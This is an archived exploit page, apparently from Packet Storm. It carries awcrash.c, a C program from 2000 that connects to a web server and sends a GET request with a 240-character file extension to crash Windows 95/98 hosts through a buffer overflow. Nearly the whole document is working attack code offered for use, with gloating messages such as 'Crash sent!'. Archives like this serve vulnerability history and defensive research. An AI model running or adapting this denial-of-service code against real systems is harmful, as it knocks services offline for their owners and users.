awcrash.c exploits a buffer overflow vulnerability in Windows 95 and 98 which will result in a crash if a filename with an extension longer that 232 characters is accessed. Although arbitrary code could be executed via this manner, it would have to be composed of valid filename character values only.
7ad7a060484ff8053e615253a0723a73a32a083f94fe5194af600dcb8126a5e4/*
Description: Dos Attack against any windows version (95/98 TESTED) by wildcoyote
Comments : Windows 95 and 98 suffer from a buffer overflow that will result in a
crash if a filename with an extension longer that 232 characters is accessed.
Although arbitrary code could be executed via this manner, it would have to
composed of valid filename character values only.
Windows NT 4.0 has not yet been tested for this vulnerability, and therefore may be vulnerable as well.
(According to a bugtraq advisorie)
Btw, knowing this, i'll use thiz flaw in windows using a GET command to a file of that caracteristicz...
(on any HTTP win [serving] host)
Flamez to : wildcoyote@gk-team.org
*/
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
int
openhost(char *host,int port) {
int sock;
struct sockaddr_in addr;
struct hostent *he;
he=gethostbyname(host);
if (he==NULL) {
perror("gethostbyname()");
exit(-1); }
sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
if (sock==-1) {
perror("socket()");
exit(-1); }
memcpy(&addr.sin_addr, he->h_addr, he->h_length);
addr.sin_family=AF_INET;
addr.sin_port=htons(port);
if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
sock=-2; }
return sock;
}
void
sends(int sock,char *buf) {
write(sock,buf,strlen(buf));
}
void
attack(char *host, int port)
{
int sock,i;
char *buf;
printf("\n\tDos Attack against any windows version (95/98 TESTED) by wildcoyote\n\n");
printf("Trying to connect to %s (%d)....(please wait)\n",host,port);
sock=openhost(host,port);
if(sock<=0) {
printf("- Could not connect -\n");
printf("Exiting...\n\n");
exit(-1);
}
else printf("Connected to %s (%d)\n",host,port);
buf = (char *) malloc(260);
strcpy(buf,"GET /command.");
for(i=0;i<240;i++) strcat(buf,"A");
strcat(buf,"\n");
printf("Oh k! Sending a 240'char (extension) filename request to host...\n");
sends(sock,buf);
close(sock);
free(buf);
printf("Crash sent! The host *probably* crashed :P\n");
printf("Send flamez to wildcoyote@gk-team.org, *Enjoy*...\n\n");
}
main(int argc, char *argv[])
{
int sock,i;
if (argc<2) {
printf("\n\tDos Attack against any windows version (95/98 TESTED) by wildcoyote\n\n");
printf("Sintaxe: %s <host> [port - default 80]\n",argv[0]);
printf("Send flamez to wildcoyote@gk-team.org, *Enjoy*...\n\n");
}
else if (argc==2) attack(argv[1],80);
else attack(argv[1],atoi(argv[2]));
}
/* www.hack.co.za [1 August2000
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed